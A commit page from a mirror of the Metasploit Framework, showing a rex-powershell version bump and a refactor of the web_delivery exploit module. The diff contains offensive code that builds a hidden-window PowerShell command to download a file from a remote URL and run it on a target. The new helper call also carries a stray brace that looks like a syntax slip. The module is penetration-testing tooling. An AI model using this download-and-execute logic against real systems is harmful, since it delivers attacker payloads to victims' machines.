infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Move over to rex-powershell and version bump 

Version bump for:
- https://github.com/rapid7/rex-powershell/pull/10
- https://github.com/rapid7/rex-powershell/pull/11
bug/bundler_fix
g0tmi1k 2017-09-25 13:45:06 +01:00
parent accb77d268
commit 1ee590ac07
2 changed files with 4 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
metasploit-framework.gemspec
View File

@ -139,7 +139,7 @@ Gem::Specification.new do |spec|
# Library for Generating Randomized strings valid as Identifiers such as variable names # Library for Generating Randomized strings valid as Identifiers such as variable names
spec.add_runtime_dependency 'rex-random_identifier' spec.add_runtime_dependency 'rex-random_identifier'
# library for creating Powershell scripts for exploitation purposes # library for creating Powershell scripts for exploitation purposes
spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"]
# Library for processing and creating Zip compatbile archives # Library for processing and creating Zip compatbile archives
spec.add_runtime_dependency 'rex-zip' spec.add_runtime_dependency 'rex-zip'
# Library for parsing offline Windows Registry files # Library for parsing offline Windows Registry files

9
modules/exploits/multi/script/web_delivery.rb
View File

@ -149,7 +149,6 @@ class MetasploitModule < Msf::Exploit::Remote
if method.include? 'string' if method.include? 'string'
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
download_and_run = "#{ignore_cert}#{download_string}"
else else
# Random filename to use, if there isn't anything set # Random filename to use, if there isn't anything set
random = "#{rand_text_alphanumeric 8}.exe" random = "#{rand_text_alphanumeric 8}.exe"
@ -164,13 +163,11 @@ class MetasploitModule < Msf::Exploit::Remote
file = %Q(echo (#{path}+'\\#{filename}')) file = %Q(echo (#{path}+'\\#{filename}'))
# Generate download PowerShell command # Generate download PowerShell command
#download_string = Rex::Powershell::PshMethods.download(url, "$z") # Can't use, due to single vs double quotes in the URL download_string = Rex::Powershell::PshMethods.download_run(url, file})
download_string = %Q^(new-object System.Net.WebClient).DownloadFile('#{url}', "$z")^
# Join PowerShell commands up
download_and_run = "$z=#{file};#{ignore_cert}#{download_string};invoke-item $z"
end end
download_and_run = "#{ignore_cert}#{download_string}"
# Generate main PowerShell command # Generate main PowerShell command
return generate_psh_command_line(noprofile: true, return generate_psh_command_line(noprofile: true,
windowstyle: 'hidden', windowstyle: 'hidden',